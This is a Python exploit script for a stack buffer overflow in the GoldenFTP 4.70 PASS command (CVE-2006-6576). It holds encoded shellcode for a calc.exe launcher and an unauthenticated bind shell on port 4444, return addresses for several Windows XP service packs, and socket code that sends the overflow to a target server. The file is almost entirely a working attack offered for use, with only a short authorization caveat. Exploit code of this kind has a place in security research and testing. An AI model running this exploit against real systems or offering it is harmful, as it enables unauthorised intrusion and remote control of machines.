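#!/usr/bin/python
#
# Exploit Title: GoldenFTP 4.70 PASS overflow exploit (v2.5)
# Date: July 8, 2011
# Author: Joff Thyer (jsthyer@gmail.com)
# Software Link: http://www.goldenftpserver.com/
# Version: 4.70
# Tested on: WinXP-SP0/SP2/SP3
# CVE: 2006-6576
#
# based on exploit by:
# Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
#
# You must make sure that the "Show new connections" option is enabled
# in order for this exploit to work.
#
# Notes:
# Specifying the IP source address is used in the calculation of the
# overflow buffer offset. It is important that the source address
# be specified correctly.
#
"""Stack overflow in the GoldenFTP 4.70 PASS command handler (CVE-2006-6576).

Usage: gftp-sploit.py <srcaddr> <target> <calc|shell> <sp0|sp2|sp3>

The PASS argument is laid out as ``nopsled + shellcode + "A" padding + JMP ESI``
so that the saved return address (``OVERFLOW_OFFSET`` bytes into the buffer,
which the server prefixes with the client's source address) is overwritten
with a ``JMP ESI`` gadget in kernel32.dll that lands back in the NOP sled.

Only run this against systems you are authorized to test.  The ``shell``
payload is an unauthenticated bind shell that the local check below expects
on 0.0.0.0:4444, i.e. reachable by anyone who can reach the host.
"""
from __future__ import print_function

import re
import socket
import sys
import time
from subprocess import PIPE, Popen

# Metasploit
# ./msfpayload windows/exec CMD=calc.exe r | ./msfencode -b '\x00\x0a\x0d' -c 3
# 281 bytes
CALC_SHELLCODE = (
    b"\xda\xd8\xbf\xbd\xe6\x2a\x25\xd9\x74\x24\xf4\x5d\x2b\xc9"
    b"\xb1\x40\x31\x7d\x19\x03\x7d\x19\x83\xc5\x04\x5f\x13\xf0"
    b"\xfc\x25\x7d\x71\xce\xb6\xa7\x0e\x14\xbc\x03\xc4\x9d\x8d"
    b"\x8d\x2b\x4d\xf7\xee\x18\x6b\x84\x32\x9a\x69\xde\x1d\x56"
    b"\x5b\x3c\x2b\x9b\xd7\x9f\x60\x60\x07\x1a\x80\xa2\x81\xae"
    b"\xce\x53\x0c\x41\x2a\x63\xce\xe5\x8c\xb1\x14\x78\x13\x69"
    b"\x5b\xe0\x83\x33\x30\x96\x31\x89\x93\x5f\x95\x5c\xe5\x63"
    b"\x23\x44\xfa\xe4\xe4\xbc\x75\x83\xb8\x5e\xa3\x1f\x86\x37"
    b"\xc8\xf4\x89\xab\x9d\x6e\x65\xac\x65\xfc\x7b\xe9\x86\xe6"
    b"\x8f\x25\x93\x03\xd4\x1d\x7f\x73\x91\xc4\x68\x67\x62\x59"
    b"\xe0\x5f\x51\x08\xfb\xd7\x1f\xb6\x5a\x27\xe9\x35\x61\x3e"
    b"\xf8\x4c\xac\x19\x43\x47\x2b\x13\x92\x9e\x1a\xed\xfd\x45"
    b"\x98\x34\x2a\x83\xb4\x84\x2e\xa0\x67\x24\x44\x5b\x32\x0b"
    b"\xbf\x5b\x7a\x9f\xa6\xc8\xd7\xaf\x04\xb9\xa2\x53\x5f\xfd"
    b"\x6f\x5b\x32\x77\xb2\x5b\xec\x53\xa1\x12\x29\x88\x5d\x0f"
    b"\x27\x92\x8b\xca\x63\x38\x4d\x1b\xd2\x26\x0e\xf8\xdf\xf4"
    b"\xef\x8f\x14\x63\xf2\x81\x9e\x60\xb0\xc6\xbe\x97\x1e\x27"
    b"\x32\x8f\x88\x29\x3e\xa4\xbe\xd6\x45\xaa\x70\xcd\x8a\xf6"
    b"\xcd\xa0\x15\x5b\x4b\x73\xde\x3c\xa6\x33\x7d\xa5\xa9\xda"
    b"\x0b\xdf\xc3\xd9\xe9\x81\x5a\xbb\x77\x47\x45\x75\xf9\x5f"
    b"\x88"
)

# Metasploit
# ./msfpayload windows/exec CMD=windows/shell_bind_tcp r | ./msfencode -b '\x00\x0a\x0d' -c3
# (command line reproduced from the original header as-is; judging by the
#  netstat check in _local_bind_shell_listening() the payload is a bind shell
#  listening on TCP 4444 — confirm against the encoder output if regenerating)
# 422 bytes
BIND_SHELL_SHELLCODE = (
    b"\xd9\xce\xba\xd6\x6f\x98\xda\xd9\x74\x24\xf4\x5f\x33\xc9"
    b"\xb1\x63\x31\x57\x1a\x03\x57\x1a\x83\xef\xfc\xe2\x23\xd5"
    b"\x9d\x94\x67\x5c\x47\xea\xae\xd5\x53\x1f\x0e\x3f\x55\x6e"
    b"\xf3\x0e\x33\x83\x08\x27\xa9\x20\xe5\x75\x83\xa5\xb5\x66"
    b"\x03\x32\x7d\xe2\xf5\xfa\x35\x4c\x0f\x9b\x44\x05\x5b\x98"
    b"\x24\x7d\xf0\xc3\xb6\xa2\x68\x9c\x42\xed\x08\x82\xfe\xbb"
    b"\x7e\xcf\x76\x76\x97\x38\xeb\xb1\x98\xd6\x51\x8b\xca\xae"
    b"\xea\x2b\x72\x86\x3b\x67\x6a\x9f\x5d\xf2\x4c\xb8\x23\x10"
    b"\x95\xd3\x01\x41\x09\x36\x93\x41\xaa\xb5\x84\xd9\x35\xb0"
    b"\x44\x13\xc0\x38\x6b\xab\x1a\x8c\xb7\xec\x30\x7a\x4a\x73"
    b"\xe5\xf1\x7e\x7e\xaf\x66\xa1\x85\x53\xea\x1a\xd7\x0b\x9a"
    b"\x9e\xf0\x04\x63\xe0\x57\xf6\x6a\x88\xb1\xef\xe0\x4a\x78"
    b"\x63\xdb\xcf\xe6\xde\xcf\xe9\x2c\x94\x5f\xef\x28\x2a\xdc"
    b"\xcd\x7a\xb2\x13\x88\xb1\x8d\x40\xcf\x0c\xf9\x52\x2f\xbc"
    b"\xd4\x34\xad\xb0\x45\xfb\xe2\xa3\xab\xa7\x46\xf6\x83\x38"
    b"\xe0\x36\x75\x7a\x6f\x96\xb3\x4f\xbe\xb9\x17\xbd\xea\x0e"
    b"\xf9\x10\x62\x2e\x91\x69\x28\xeb\xe6\x07\x23\x0f\xf6\x26"
    b"\x4a\xec\xba\xd8\x74\xba\xe6\x38\xb3\x56\x13\xf1\x8d\x70"
    b"\x98\xc9\x60\xcf\x9c\xf5\x1f\x8f\x8f\x04\x6c\x61\x63\x25"
    b"\x87\x89\x1d\x58\x4f\x18\xca\xcb\x11\x03\x24\x6b\xa6\xbd"
    b"\x47\x90\x43\xc5\x9f\x3f\xc8\x64\x3a\xcc\x69\xc7\x9c\x2d"
    b"\x19\xc1\x67\xfa\x07\xcb\xd7\x92\x83\x23\x50\xdf\xa2\xd8"
    b"\x08\xa8\xec\x43\xbb\xda\x10\xc2\x0b\x30\xb7\xdd\xbd\x33"
    b"\x6a\x18\x98\x1e\xc1\x5e\x77\xeb\xe8\x21\x4e\x18\x60\x6f"
    b"\x60\x5c\x99\xb6\x7e\x28\xdb\xda\x40\xea\x8c\xc7\x5c\x70"
    b"\x7f\xd1\x61\xaf\x42\x25\x8d\xec\xb9\xde\x5f\x40\xa2\xa2"
    b"\xe2\x39\x6f\x85\x54\xd3\xa0\xef\x4c\x08\x23\xb5\x88\x85"
    b"\xc0\xfc\xd2\x50\x68\x5b\x93\x33\x8a\x6e\xf8\x4d\x79\xa8"
    b"\x29\x56\x39\xee\x4f\xd2\x49\x48\x4e\x0e\x1c\x8a\xd5\xa6"
    b"\xd0\x94\xfb\xda\x22\x3d\xf4\x22\xe7\x54\xff\xa2\x05\xc4"
    b"\x8c\xc7"
)

# Command-line payload selector -> encoded shellcode.
SHELLCODES = {
    "calc": CALC_SHELLCODE,
    "shell": BIND_SHELL_SHELLCODE,
}

# address of JMP ESI in Kernel32.dll, per service pack (little-endian).
# These are fixed kernel32 addresses for the tested XP builds; a different
# patch level of kernel32.dll will move the gadget and the exploit will
# simply crash the service instead of jumping into the sled.
JMP_ESI = {
    "sp0": b"\x7b\x15\xe8\x77",
    "sp2": b"\xc3\x72\x85\x7c",
    "sp3": b"\x0b\xda\x82\x7c",
}

FTP_PORT = 21
# Bound on every socket operation so a non-responding target cannot hang the
# script forever (the original had no timeout on recv()).
SOCKET_TIMEOUT = 10.0
NOPSLED_LEN = 60
# Offset of the saved return address from the start of the overflowed buffer;
# the server prefixes the buffer with the client's source address, which is
# why the caller-supplied srcaddr takes part in the padding calculation.
OVERFLOW_OFFSET = 533
# Sent as a first line before USER/PASS, as in the original exploit:
# four NOPs and a short forward jump (EB 20).
SHORTJMP = b"\x90\x90\x90\x90\xeb\x20\n"
BIND_SHELL_PORT = 4444
USAGE = (
    "[-]Usage: %s <srcaddr> <target> <shellcode> <platform>\n"
    "\tshellcode = (calc|shell)\n"
    "\tplatform = (sp0|sp2|sp3)\n"
    "\tExample: ./gftp-sploit.py 1.2.1.2 5.6.5.4 calc sp2"
)


def build_payload(srcaddr, shellcode, platform):
    """Return the PASS argument (bytes) for the given source address and options.

    Layout: ``NOPSLED_LEN`` NOPs, the selected shellcode, ``A`` padding up to
    ``OVERFLOW_OFFSET - len(srcaddr)`` bytes, then the 4-byte JMP ESI address.

    Args:
        srcaddr: the client IP as the server will see it; only its length
            matters here, but a wrong address shifts the return address.
        shellcode: key into ``SHELLCODES`` (``"calc"`` or ``"shell"``).
        platform: key into ``JMP_ESI`` (``"sp0"``, ``"sp2"`` or ``"sp3"``).

    Raises:
        ValueError: unknown shellcode/platform name, or the shellcode plus
            NOP sled does not fit in front of the return address.  (The
            original silently fell back to ``calc`` for an unknown shellcode
            and crashed with NameError for an unknown platform.)
    """
    try:
        buf = SHELLCODES[shellcode]
    except KeyError:
        raise ValueError("unknown shellcode %r (expected one of: %s)"
                         % (shellcode, ", ".join(sorted(SHELLCODES))))
    try:
        jmpesi = JMP_ESI[platform]
    except KeyError:
        raise ValueError("unknown platform %r (expected one of: %s)"
                         % (platform, ", ".join(sorted(JMP_ESI))))

    nopsled = b"\x90" * NOPSLED_LEN
    pad_len = OVERFLOW_OFFSET - (len(srcaddr) + len(buf) + len(nopsled))
    # "A" * negative is silently "" in Python, which would put the return
    # address at the wrong offset; refuse instead of sending a broken buffer.
    if pad_len < 0:
        raise ValueError("shellcode %r (%d bytes) plus %d-byte nopsled does not "
                         "fit in %d bytes with a %d-character source address"
                         % (shellcode, len(buf), NOPSLED_LEN, OVERFLOW_OFFSET,
                            len(srcaddr)))
    padding = b"A" * pad_len
    return nopsled + buf + padding + jmpesi


def _local_bind_shell_listening():
    """Return the netstat line for a listener on 0.0.0.0:BIND_SHELL_PORT, else None.

    Parses Windows ``netstat -na`` output (``TCP  0.0.0.0:4444 ... LISTENING``);
    main() only calls this when the target is this host.  Returns None (with a
    message) if netstat cannot be run.
    """
    try:
        proc = Popen(["netstat", "-na"], stdout=PIPE, shell=False)
    except OSError as exc:
        print("[-] Could not run netstat: %s" % exc)
        return None
    out = proc.communicate()[0]
    if not isinstance(out, str):
        # Python 3 hands back bytes; decode leniently, the match is ASCII.
        out = out.decode("utf-8", "replace")
    match = re.search(r"TCP\s*0\.0\.0\.0:%d.*LISTENING" % BIND_SHELL_PORT, out)
    return match.group(0) if match else None


def main(argv=None):
    """Run the exploit from the command line; return the process exit status.

    Args:
        argv: argument vector including the program name (defaults to sys.argv).

    Returns:
        0 on completion, 1 on usage error, bad options or connection failure
        (the original exited 0 in every case, which hides failures from callers).
    """
    argv = sys.argv if argv is None else argv
    if len(argv) < 5:
        print(USAGE % argv[0])
        return 1
    srcaddr, target, shellcode, platform = argv[1:5]

    try:
        payload = build_payload(srcaddr, shellcode, platform)
    except ValueError as exc:
        print("[-] %s" % exc)
        return 1

    print("[+] Golden FTP PASS Exploit")
    print("[+] Version 2.5, July 8 2011")
    print("[+] Author: Joff Thyer (jsthyer@gmail.com)")
    print("[+] 'Show new connections' must be enabled in GoldenFTP in order")
    print("[+] for this exploit to succeed!")
    print("[+] Connecting: " + target)

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(SOCKET_TIMEOUT)
    try:
        sock.connect((target, FTP_PORT))
    except socket.error as exc:
        print("[-] Connection to " + target + " failed! (%s)" % exc)
        sock.close()
        return 1

    try:
        print("[+] Sending payload, length = %d" % len(payload))
        try:
            # sendall() rather than send(): a partial write would truncate
            # the overflow buffer and land the return address short.
            sock.sendall(SHORTJMP)
            sock.sendall(b"USER anonymous\n")
            sock.sendall(b"PASS " + payload + b"\n")
            sock.recv(1024)
        except socket.error as exc:
            # A reset/timeout here is not necessarily a failure: the service
            # may have gone down because the overflow fired.  Report and go on.
            print("[!] Socket error after sending payload: %s" % exc)
        print("[+] Sleeping 2 secs...")
        time.sleep(2)
    finally:
        sock.close()

    # The listener check only makes sense when we exploited ourselves.
    if shellcode == "shell" and srcaddr == target:
        listener = _local_bind_shell_listening()
        if listener:
            print("[+] " + listener)

    print("[+] Done.")
    return 0


if __name__ == "__main__":
    sys.exit(main())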